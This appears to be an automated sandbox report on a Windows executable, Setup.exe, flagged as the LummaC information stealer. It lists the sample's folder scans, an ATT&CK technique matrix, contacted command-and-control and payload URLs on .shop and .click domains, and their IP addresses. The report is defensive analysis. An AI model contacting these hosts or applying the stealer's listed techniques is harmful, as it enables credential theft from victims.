              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6984, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory221
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Setup.exe9%VirustotalBrowse
              Setup.exe11%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://locketsashayz.click/0000Z0o0%Avira URL Cloudsafe
              https://locketsashayz.click/op0%Avira URL Cloudsafe
              https://locketsashayz.click/pi0%Avira URL Cloudsafe
              https://locketsashayz.click:443/api0%Avira URL Cloudsafe
              https://locketsashayz.click/s0%Avira URL Cloudsafe
              https://locketsashayz.click/M0%Avira URL Cloudsafe
              https://cegu.shop/100%Avira URL Cloudmalware
              https://locketsashayz.click/api.I0%Avira URL Cloudsafe
              https://locketsashayz.click/api9H0%Avira URL Cloudsafe
              https://locketsashayz.click/pijH0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtks100%Avira URL Cloudmalware
              https://locketsashayz.click/0%Avira URL Cloudsafe
              https://locketsashayz.click/H0%Avira URL Cloudsafe
              https://locketsashayz.click/lao0%Avira URL Cloudsafe
              https://locketsashayz.click/apil0%Avira URL Cloudsafe
              https://locketsashayz.click/api0%Avira URL Cloudsafe
              https://cegu.shop/Q100%Avira URL Cloudmalware
              https://locketsashayz.click/0R0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txt)E100%Avira URL Cloudmalware
              https://cegu.shop/I100%Avira URL Cloudmalware
              https://locketsashayz.click/apiV0%Avira URL Cloudsafe
              https://locketsashayz.click/apiU0%Avira URL Cloudsafe
              locketsashayz.click0%Avira URL Cloudsafe
              https://locketsashayz.click/apiR0%Avira URL Cloudsafe
              https://cegu.shop/5100%Avira URL Cloudmalware
              https://locketsashayz.click/bu90%Avira URL Cloudsafe
              https://locketsashayz.click/bu0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                locketsashayz.click
                		188.114.97.3
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://locketsashayz.click/apitrue
                  • Avira URL Cloud: safe
                  		unknown
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            https://cegu.shop/8574262446/ph.txtfalse
                              		high
                              locketsashayz.clicktrue
                              • Avira URL Cloud: safe
                              		unknown
                              framekgirus.shopfalse
                                		high
                                tirepublicerj.shopfalse
                                  		high
                                  abruptyopsn.shopfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://locketsashayz.click/0000Z0oSetup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://locketsashayz.click/sSetup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://locketsashayz.click/pijHSetup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://locketsashayz.click:443/apiSetup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://locketsashayz.click/opSetup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cegu.shop/Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://dfgh.online/invoker.php?compName=Setup.exe, 00000000.00000002.4139812014.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4140538030.000000000413A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://locketsashayz.click/api9HSetup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://locketsashayz.click/piSetup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://locketsashayz.click/api.ISetup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://locketsashayz.click/MSetup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://locketsashayz.click/HSetup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cegu.shop/8574262446/ph.txtksSetup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://locketsashayz.click/laoSetup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://klipvumisui.shop/int_clp_sha.txtSetup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://locketsashayz.click/apilSetup.exe, 00000000.00000003.1923253582.00000000014E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://locketsashayz.click/0RSetup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://locketsashayz.click/Setup.exe, 00000000.00000002.4139549503.0000000001419000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cegu.shop/QSetup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://klipvumisui.shop/int_clp_sha.txt)ESetup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://cegu.shop/ISetup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://locketsashayz.click/apiUSetup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://locketsashayz.click/apiVSetup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://locketsashayz.click/bu9Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://crl.microSetup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944587341.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959265174.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.microsofSetup.exe, 00000000.00000003.1844311579.00000000041C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://locketsashayz.click/apiRSetup.exe, 00000000.00000003.1968199543.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cegu.shop/5Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://locketsashayz.click/buSetup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    188.114.97.3
                                                                                    		locketsashayz.clickEuropean Union
                                                                                    		13335CLOUDFLARENETUStrue
                                                                                    185.161.251.21
                                                                                    		cegu.shopUnited Kingdom
                                                                                    		5089NTLGBfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1583039
                                                                                    Start date and time:2025-01-01 16:55:15 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 46s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:5
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Setup.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                    EGA Information:Failed
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 0
                                                                                    • Number of non-executed functions: 1
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target Setup.exe, PID 6984 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    10:56:21API Interceptor9x Sleep call for process: Setup.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rgenerousrs.store/o362/
                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.beylikduzu616161.xyz/2nga/
                                                                                    Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                    • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                    ce.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/lxvbq
                                                                                    Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
